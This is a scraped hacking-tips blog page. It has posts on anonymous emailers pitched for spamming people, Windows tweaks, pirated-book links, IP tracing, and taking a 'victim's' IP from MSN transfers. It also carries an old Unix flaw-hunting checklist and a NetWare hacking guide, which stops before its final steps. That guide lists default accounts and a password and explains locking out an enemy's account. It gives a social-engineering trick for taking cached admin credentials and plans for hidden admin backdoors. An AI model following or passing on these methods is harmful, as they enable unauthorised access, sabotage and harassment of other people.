Anonymous emailer services are the perfect thing if u donot want ur email reciever to find out who u are. You can use these services to also spam ppl u dont like :P

The best, most secure and least traceable way to send an email anonymously is still to use a remailer "manually". If you do not require absolute anonymity, though, here are a few services that let you send anonymous emails easily through a web interface.

AdviceBoxAdvicebox lets you send anonymous (your identity will be known to Advicebox, but not be revealed to the recipient) emails easily and lets you receive replies via a Web interface, too.


AnonymousSpeechMail sent via AnonymousSpeech contains no traces to the sender, though you can even receive replies.




try these out n comment

Labels: Hacks, Internet Tips

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

Suppose you want to lock the folder movies in d: which has the path D:\movies.In the same drive create a text file and type
ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}movies
Now save this text file as key.bat

Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder.

Check it out!!!!!!!




TO UNLOCK DO THE FOLLOWING
:

create another text file and type in it
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
Now save this text file as key.bat

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

To speed up your hard disk speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the disk.
This tip is only recommended if you have 256MB RAM or higher.
Follow these steps:

Run SYSEDIT.EXE from the Run command.

Expand the system.ini file window.

Scroll down almost to the end of the file till you find a line called [386enh].

Press Enter to make one blank line, and in that line type

Irq14=4096

Note: This line IS CASE SENSITIVE!!!

Click on the File menu, then choose Save.

Close SYSEDIT and reboot your computer.

Done. Speed improvement will be noticed after the computer reboots.

Labels: Downloads, Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

http://rapidshare.de/files/37379997/Hacking_Windows_XP__Jul_2004_.rar

or

http://www.megaupload.com/?d=XYTFQCIN

password
a paulmann posting

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b
[ftp://ftp.visualware.com/pub/vr/vr.exe]
Neotrace
[http://www.neoworx.com/download/NTX325.exe]
or by our way ie. Using MS DOS or any other version of DOS.
Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.

Let us take a look at tracert tool provided for DOS by Microsoft.
It is a very handy tool for peoples need to trace down an IP.
Just open any DOS windows and type tracert.

C:\windows>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
You will now see a description of the tracert command and the switches associated with it.
Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.
By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.
Now its time for execution.
Let us trace down the IP yahoo.com [216.115.108.243]

TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202

C:\WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

1 308 ms 142 ms 127 ms 203.94.246.35
2 140 ms 135 ms * 203.94.246.1
3 213 ms 134 ms 132 ms 203.94.255.33
4 134 ms 130 ms 129 ms 203.200.64.29
5 122 ms 135 ms 131 ms 203.200.87.75
6 141 ms 137 ms 121 ms 203.200.87.15
7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
10 * * * Request timed out.
11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]
16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]
Trace complete.

Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.

Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]
First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.
Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.

Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

::

This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.
The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.
To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:
Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED
The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons
physical access to the machine, where this might allow them to perform
things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would
be trivial for a user to reboot a machine into single-user mode and muck
around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential
backup tapes, which may (otherwise) be read by any user with access to
the tapes and a tape drive, whether they are meant to have permission or
not.

2) Software Security Holes

- Where the problem is caused by badly written items of "privledged"
software (daemons, cronjobs) which can be compromised into doing things
which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see
bibliography) which would enable a cracker to bootstrap a "root" shell.
This could be used to delete your filestore, create a new account, copy
your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just
restricted to the infamous "Internet Worm" - any cracker could do this
by using "telnet" to port 25 on the target machine. The story behind a
similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

a: try to structure your system so that as little software as possible
runs with root/daemon/bin privileges, and that which does is known to
be robust.

b: subscribe to a mailing list which can get details of problems
and/or fixes out to you as quickly as possible, and then ACT when you
receive information.

>From: Wes Morgan
>
> c: When installing/upgrading a given system, try to install/enable only
> those software packages for which you have an immediate or foreseeable
> need. Many packages include daemons or utilities which can reveal
> information to outsiders. For instance, AT&T System V Unix' accounting
> package includes acctcom(1), which will (by default) allow any user to
> review the daily accounting data for any other user. Many TCP/IP packa-
> ges automatically install/run programs such as rwhod, fingerd, and
> tftpd, all of which can present security problems.
>
> Careful system administration is the solution. Most of these programs
> are initialized/started at boot time; you may wish to modify your boot
> scripts (usually in the /etc, /etc/rc, /etc/rcX.d directories) to pre-
> vent their execution. You may wish to remove some utilities completely.
> For some utilities, a simple chmod(1) can prevent access from unauthorized
> users.
>
> In summary, DON'T TRUST INSTALLATION SCRIPTS/PROGRAMS! Such facilities
> tend to install/run everything in the package without asking you. Most
> installation documentation includes lists of "the programs included in
> this package"; be sure to review it.

3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the
System Manager assembles a combination of hardware and software which
when used as a system is seriously flawed from a security point of view.
It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and
running, so it is better to build your system with them in mind. It's
never too late to have a rethink, though.

Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it.

>From: Gene Spafford
>The fourth kind of security problem is one of perception and
>understanding. Perfect software, protected hardware, and compatible
>components don't work unless you have selected an appropriate security
>policy and turned on the parts of your system that enforce it. Having
>the best password mechanism in the world is worthless if your users
>think that their login name backwards is a good password! Security is
>relative to a policy (or set of policies) and the operation of a system
>in conformance with that policy.

---

From: Hacking
Subject: Hacking Ideas
Date: 11/10/93

( Please contribute by sending E-Mail to ... )

[ Many ideas taken from: HaxNet - APG V1.3 : Guide to finding new holes]

NOTE: I think this should be divided into general categories:
1) General principles
2) Looking for holes in src (most items here)
3) Looking in binary distributions
4) Looking in site specific configurations

The following general classifications suggest themselves:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories

(Suggested splitting of above into main and sub-catagories)
I: Suid binaries and scripts
unexpected user interactions
flawed liberary calls
implicit assumptions of external conditions (sym links, loc. paths)
race conditions
II: daemons running with priviliged uid's
race conditions
poor file protectons
implicit file protections
trust
authentication
III: Kernel problems
Kernel race conditions
device driver code

The following four step method was created by System Development
Corporation, who report a 65% success rate on the flaw hypotheses
generated. Doing a comprehensive search for operating system flaws
requires four steps:

Step 1) Knowledge of system control structure.
===============================================
To find security holes, and identifying design weaknesses it is
necessary to understand the system control structure, and layers.
One should be able to list the:
A) security objects: items to be protected. ie: a users file.
B) control objects: items that protect security objects. ie: a i-node
C) mutual objects : objects in both classes. ie: the password file
With such a list, it is possible to graphically represent a control
hierarchy and identify potential points of attack. Making flow charts
to give a visual breakdown of relationships definitely helps.
Reading the various users, operators, and administrators manuals should
provide this information.
(following para's should probably be moved to a "legal" section)
Reading and greping source code should also prove valuable. For those
without a source licence, I would suggest we use LINUX, NET2, and BSD386
distributions in order to stay legal. At some future time we may be able
to form a working contract between someone or a company with legal access
to other distributions and members actively participating in this project.
It appears that extracts of proprietary code may be used for academic
study, so long as they are not reused in a commercial product - more
checking is necessary though.

Step 2) Generate an inventory of suspected flaws. (i.e. flaw hypotheses)
========================================================================
In particular we want:
Code history:
What UNIX src does a particular flavor derive from? This is important
for cross references (very often only one vendor patches certain code,
which may get reused, in it's unpatched reincarnation by others)
A solid cross reference:
Who checked which bug in what OS and what version prevents us from
duplicating work.

A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. i.e.:
rcp is suid root because it must use a privilaged port to do user
name authentication.
Often code that was never designed to be suid, is made suid, durring
porting to solve file access problems.
We need to develope a data base that will be able to look at pairs and
triplets of data, specificly: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flav/vers geniology.
Any sugestions on how to implement such a DB?

Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================

Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================

Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e.
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c

PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.

TCOV:

CRASH: Posted to USENET (what FTP archive?) (descrip?)

PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Emphirical Study of the reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout on the environment in question, and the expected input is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).

Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
ie: the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy() which is why most src has:
#define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))

2) SUID/SGID routines written in one of the shells, instead of C or
PERL.

3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.)

4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.

5) Any program that uses relative path names inside the program.

6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).

7) Routines that don't check error return codes from system calls. (ie:
fork(2), suid(2), etc), setuid() rather, as in the famous rcp bug

8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.

9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.

10) Look in man pages, and users guides for warnings against doing X, and
try variations of X. Ditto for "bugs" section.

11) Look for seldom used, or unusual functions or commands - read backwards.
In particular looking for undocumented flags/arguments may prove useful.
Check flags that were in prior releases, or in other OS versions. Check
for options that other programs might use. For instance telnet uses -h
option to login ...
right, as most login.c's I've seen have:
if((getuid()) && hflag){
syslog()
exit()
}

12) Look for race conditions.

13) Failure of software to authenticate that it is really communicating
with the desired software or hardware module it wants to be accessing.

14) Lack or error detection to reset protection mechanisms following an
error.

15) Poor implementation resulting in, for example, condition codes being
improperly tested.

16) Implicit trust: Routine B assumes routine A's parameters are correct
because routine A is a system process.

17) System stores it's data or references user parameters in the users
address space.

18) Inter process communication: return conditions (passwd OK, illegal
parameter, segment error, etc) can provide a significant wedge, esp.
when combined with (17).

19) User parameters may not be adequately checked.

20) Addresses that overlap or refer to system areas.

21) Condition code checks may be omitted.

22) Failure to anticipate unusual or extraordinary parameters.

23) Look for system levels where the modules involved were written by
different programmers, or groups of programmers - holes are likely
to be found.

24) Registers that point to the location of a parameters value instead
of passing the value itself.

25) Any program running with system privileges. (too many progs are given
uid 0, to facilitate access to certain tables, etc.)

26) Group or world readable temporary files, buffers, etc.

27) Lack of threshold values, and lack of logging/notification once these
have been triggered.

28) Changing parameters of critical system areas prior to their execution
by a concurrent process. (race conditions)

29) Inadequate boundary checking at compile time, for example, a user
may be able to execute machine code disguised as data in a data area.
(if text and data areas are shared)

30) Improperly handling user generated asynchronous interrupts. Users
interrupting a process, performing an operation, and either returning
to continue the process or begin another will frequently leave the
system in an unprotected state. Partially written files are left open,
improper writing of protection infraction messages, improper setting
of protection bits, etc often occur.

31) Code that uses fopen(3) without setting the umask. ( eg: at(1), etc. )
In general, code that does not reset the real and effective uid before
forking.

32) Trace is your friend (or truss in SVR4) for helping figure out what
system calls a program is using.

33) Scan /usr/local fs's closely. Many admins will install software from
the net. Often you'll find tcpdump, top, nfswatch, ... suid'd root for
their ease of use.

34) Check suid programs to see if they are the ones originally put on the
system. Admins will sometimes put in a passwd replacement which is less
secure than the distributed version.

35) Look for programs that were there to install software or loadable
kernel modules.

36) Dynamically linked programs in general. Remember LD_PRELOAD, I think
that was the variable.

37) I/O channel programming is a prime target. Look for logical errors,
inconsistencies, and omissions.

38) See if it's possible for a I/O channel program to modify itself, loop
back, and then execute the newly modified code. (instruction pre-load
may screw this up)

39) If I/O channels act as independent processors they may have unlimited
access to memory, thus system code may be modified in memory prior to
execution.

40) Look for bugs requiring flaws in multiple pieces of software, i.e. say
program a can be used to change config file /etc/a now program b assumes
the information in a to be correct and this leads to unexpected results
(just look at how many programs trust /etc/utmp)

41) Any program, especially those suid/sgid, that allow shell escapes.

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

http://www.fakenamegenerator.com/index.php

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

1. Introduction to Novell Netware
2. What is the 'console' and 'NDS'?
3. How do I know if they're running Novell?
4. I'm still not sure. I have a normal user account. How can I check with this?
5. What are the usual accounts and passwords and how do I find a valid account?
6. How do I lockout my enemies account?
7. Is there another easy way to get Admin access?
8. What about the Net Plug attack?
9. What's a backdoor and is it useful to me ?
10. Once I'm in, can I leave a back door?
11. Leaving an Admin level user in the NDS Tree
12. Okay, now how do I leave a backdoor into the server itself?
13. Accessing servers drives that you shouldn't be able to see


Introduction to Novell Netware

Novell Netware is a server based operating system for networks. Unlike Unix and NT, Netware isn't an all in one program. Let me explain. Netware itself runs on top of a version of DOS. The version that you might be familiar with is MS-DOS as this comes with Windows 95 and 98. Novell uses DR-DOS. This is very similar to MS-DOS and even uses the same sort of commands. When a Netware server starts up, first it loads up DR-DOS (also known as Caldera DOS because Caldera wrote it). Once DOS is started, Netware is loaded which then sets up the server itself. Once this has been done, the server is happily sitting on the network and awaiting requests. Netware has two main admin areas. First is the console and second is NDS.

What is the 'console' and 'NDS'?

The console is kind of like a DOS prompt. It takes commands in the same way as you'd expect and it looks almost the same to. The prompt though (the bit before you type in your commands) is somewhat different. In MS-DOS, you might get a prompt like this:

C:\WINDOWS >

This bit is the directory you are currently in. Here, you can see I'm in the
Windows directory. Netware doesn't have this and I'll explain why a little later

The 'C:\' shows the current drive. Netware has something like this but it doesn't actually show you what drive you are in. Again, I'll explain this later.


You've seen what the MS-DOS version is like. Here then is a sample from a Netware server named "Gandalf".

GANDALF :

The console is designed simply for managing the server itself. Not the files or its users as can be done with an NOS (Network Operating System) such as Linux. Commands entered here affect only the server that is in the prompt. In this case, only server Gandalf will be affected by my commands.
You can run or 'load' programs into the server in the form of NLMs ( Netware Loadable Modules). These can be seen as plugins for the server. Once run, the program will automatically be set-up. I'm mentioning this now because some of the best hacks require software to be loaded in at the server. I'll cover this later though.
The console can also be access from another computer using a piece of software called "RCONSOLE". This is a DOS based program so you will need to be able to run DOS programs on your machine. Many Admins disable this on user accounts and only have it active on Admin accounts. Even if you can run RCONSOLE, you will still need a password to access the server. Most servers are left at the console so no logging in is necessary. However, servers tend to be well guarded!

NDS (Netware Directory Service) is where all the user and file information is stored. It is usually referred to as the "NDS Tree". You could easily compare it to a telephone directory. The NDS Tree holds all the information about a network. From the individual workstations to the users to the servers and the files stored on them. Because everything in general is managed through NDS, this is really the kind of access you want. Console access is useful (you can kick people you don't like off the server) but having the ability to alter anything on the network is much more fun.
The program that you need to access the NDS Tree is called 'nwadmn32.exe'. This is usually available somewhere on the system because it isn't directly a security risk. If you load it as a normal user, you will only have rights to alter some parts of that user such as the password. You may not be able to touch other peoples information but you can usually read it. I'll come back to this later on.

How do I know if they're running Novell?

This is an easy one. Before you can use any machine on a Novell network, you must login. Novell like to show everyone just how good they think they are and splash their name and their stupid red 'N' logo everywhere that they feel they can get away with. This includes the login screen.
If for some reason you don't have this on your login screen but you still think that you are on a Novell network, take a closer look at the login screen. Most networks now use the latest client which supports contextless logins. Although this sounds complicated it isn't. Normally when you login to Novell, you must tell the server what 'context' you are in. This lets people have the same user names. For instance for me to login to Gandalf I'd need to supply :

Miggyx.admin.users.abc


This is a short one. Many go much deeper than this and have six levels or more! Problem is humans aren't too hot at remembering these long login names. For this reason Novell brought out contextless logins. You pick an option from a drop down menu then fill in only the user name. For instance :


Context : Server Admins
User : miggyx

Passwd : ******


Instead of :

User : miggyx.admin.users.abc

Passwd : ******

Basically it was all done to make users lives easier. This option never appears on Unix or NT systems because they don't support multiple user names and thus context is irrelevant. If your system has this on the login screen, you definitely have Novell Netware.

I'm still not sure if I'm on a Novell network. I have a normal user account. How can I check with this?

Yes you can and if you have a real account, it will make your life a lot easier. It is easier to hack a system that you have some access to than to start from scratch. Login and see if you have a little red 'N' in the taskbar. This is Novell's little Admin tool for the user themselves and it has a few interesting properties too which I'll cover later. If you have this 'N' you are definitely on a Novell network. However some mean Admins turn off the nice little 'N'.
You can also right click on a network drive. A network drive is a directory on a remote computer that has been made to look like a hard drive on your machine. You'll find these in 'My Computer'. Right click on them. In this menu, there will be several entries with the red 'N' next to them. Again this is a dead give away that you are running on a Novell network.

Hmmmm..... I don't have an account. What are the usual accounts and passwords and how do I find a valid account?

Well, there are quite a few standard user names and passwords that are used on Novell networks. However not all of them are used and sometimes not one is used. This list comes from the Netware Hack FAQ and I've found it to be quite comprehensive :

Account Purpose
---------- ------------------------------------------------------
PRINT Attaching to a second server for printing
LASER Attaching to a second server for printing
HPLASER Attaching to a second server for printing
PRINTER Attaching to a second server for printing
LASERWRITER Attaching to a second server for printing
POST Attaching to a second server for email
MAIL Attaching to a second server for email
GATEWAY Attaching a gateway machine to the server
GATE Attaching a gateway machine to the server
ROUTER Attaching an email router to the server
BACKUP May have password/station restrictions (see below), used
for backing up the server to a tape unit attached to a
workstation. For complete backups, Supervisor equivalence
is required.
WANGTEK See BACKUP
FAX Attaching a dedicated fax modem unit to the network
FAXUSER Attaching a dedicated fax modem unit to the network
FAXWORKS Attaching a dedicated fax modem unit to the network
TEST A test user account for temp use
ARCHIVIST Palidrome default account for backup
CHEY_ARCHSVR An account for Arcserve to login to the server from
from the console for tape backup. Version 5.01g's
password was WONDERLAND. Delete the Station
Restrictions and use SUPER.EXE to toggle this
account and you have an excellent backdoor.
ROOT Found on Shiva LanRovers, gets you the command-line
equiv of the AdminGUI. By default, no password. A lot
admins just use the AdminGUI and never set up a
password.


Some of these are used quite a lot of the time. ROOT is a good example because it also ties in with superuser access on Unix and Linux servers. Having a user called root is quite common now. Accounts by the name 'Admin' , 'Administrator' and 'Manager' are in common use to.

How do I find out if an account is valid?

This is surprisingly easy. Type in the username you are trying to check. Type in any password unless you know it ( if you know the password then the account is obviously valid) and press enter. You will likely get an error message back. If the message says something on the lines of "Invalid password" or "Unknown Error" followed by a number , it is a fair bet that the account exists. If you get the Unknown Error message, it is likely that the account is there but has been locked out. This is also a cunning way of locking out someone's account who you don't like.

How do I lock out my enemies accounts?

Well, this is particularly easy to do. Most Admins for security have a limit on how many times someone can login incorrectly before the account gets locked out. This is usually set to 5 times. Here's how you do it.

1. Type in your friend /enemies login name.
2. Put it an obviously wrong password. Anything will do.
3. Hit 'Enter'.
4. The computer should bounce back with an error about an invalid password. This is what we want so keep going.
5. Repeat from stage three until the server comes back with an unknown network error.

Once you get the unknown network error, you have successfully locked out the account. It won't work again until an admin manually unlocks it. This could mean a disabled account for hours or even days. Snik snik!



Is there an easy way to get Admin access?

This only works on Netware 3.*. You use a program called NW-HACK.exe . A nice little program that sits and waits till an Admin logs in and then creates a nice account for you with super user access. You will be able to find this program on the Internet but I'm not going to spend much time on it because it has a full set of docs with the program itself.

What about the Net Plug attack?

This is an attack that I worked out myself before I was given Admin status. It always works and I've yet to see it fail. Make sure you are at a windows 95 or 98 machine. I doubt NT would be fooled by this trick but I don't have any NT machines so I can't test it for you.



Note : Most Admins, believe that they are the most knowledgeable about their system. Many also believe that no one else knows much about computers. In other words, for whatever reasons, they are not too concerned about us i.e. the idiots attacking their servers. Why? Because we aren't good enough. So why waste valuable time configuring security that won't be needed eh? I think I've made my point. They don't see us as a threat. You don't consider a house spider a threat so you don't go round putting up netting to keep them out. Why? You can't be bothered. The same rule applies here. Even if you are a computer genius, play it dumb. Admins like to lecture the uninitiated and would love to appear smarter than you. This is the way you want it. The Admins will think you're a nice guy or gal, totally harmless. This sometimes gives you more leverage because they like you, they'll be willing to help you. They also won't expect you to launch a huge assault on their servers either However sometimes there are some smart people out there who will notice your talents and pull you over to their side. This isn't a bad place to be and can be advantageous later.



First of all, login as yourself. Crash your computer and reset it . Walk over to your favourite admin (the one that hates you most is the best choice ) and apologise for being an idiot but the computer won't let you login and could s/he please come and take a look for you. Mumbling and grumbling they'll come over. The best way to test if it is the machine is for them to login. Of course, they'll log in as an admin or equivalent. They'll check your account and see that your account is fine. They'll tell you to log onto another machine and your account will be okay. They'll now log off and walk off in disgust thinking you are a computer moron. Not so my friend, we've just done them good and proper!
Turn off the computer and pull out the network lead. Turn it back on again. The computer will detect that you aren't on a network and will dump you at a desktop with restrictions of the last user. If this user is the admin then chances are that he or she will have full access to everything including DOS and drive access. Perfect for installing all those really kewl programs you have on a disk in your pocket......
But you aren't on the network now. That's no fun is it? Shove the lead back in and try to access a network drive. This is the bit where you hope the Admins are sloppy or not computer geniuses. Windows by default caches ALL passwords so unless the Admins have told it not to ( a key deep in the registry) then windows will have a nice copy of their password. Go into 'My Computer' and click on a drive. Whoop with glee as Netware logs you in as an Admin. Why does this happen? Well windows still holds the username and password last used to access the drive. You are logged into windows as Admin and windows knows what credentials you last gave to the server. So it supplies them for you. Likewise because you are now authenticated you know have full access to the NDS tree. Not only can you read but you can no write, modify delete etc etc. Much more fun!
Now, this is the bit where you have to be sneaky. You have to make a new account for yourself or upgrade your old one. There are pros and cons to each of your choices. If you alter your existing account and they check it for some reason ( maybe you got locked out? ) they'll notice you have admin rights and shoot you. If you make a new user, it might get found quicker but there is no way to point to you ( it was created by user admin after all tee hee ). The choice is yours. You can always do both.


What's a backdoor and is it useful to me ?

A back door like the name suggests is a way into a system without going through the front door. The front door being the proper way in. Your backdoor will give you full access (or whatever it was set-up to do) without anyone else knowing about it.
It is useful to you because it gives you a lot of power and anonymity. People won't know that it was you that deleted that account or altered your reports. You'll be like the ghost in the machine. Invisible and all powerful. Doesn't that sound wonderful to you?

Once I'm in, can I leave a back door?

Yes, there are many different ways of leaving a back door and may different things a back door can be designed to do. Firstly, the most powerful backdoor is the one that gives you full access to an entire system. Unfortunately, these are the hardest to set-up (unless you did my Net Plug trick) and the Admins aren't blind. They'll notice that a new admin account has appeared. Unless of course you hide it. This isn't all that easy but it can be done. The second type of backdoor gives you access to the server (like rconsole). These aren't as powerful but they still have the ability to run things like the 'down' command. The 'Down' command shuts the server down and dumps it at a DOS prompt. Another powerful command is the load command. This sticks programs into memory. Unfortunately all but the most stupid Admins log the console.

Leaving an Admin level user in the NDS Tree

This is the best way of hiding a user in the NDS Tree. Most Admins have only been on the CNA (Certified Novell Administrator) course so won't have the expertise to locate the user even if they did think that it existed. Even if they have a CNE (Certified Novell Engineer) they aren't likely to find your user because not only don't they know where to look, they won't know your user is there. The best crimes aren't ones that you can get away with without being caught. The best crimes are ones that the victim doesn't even know have happened.
Anyway, here is what you have to do :

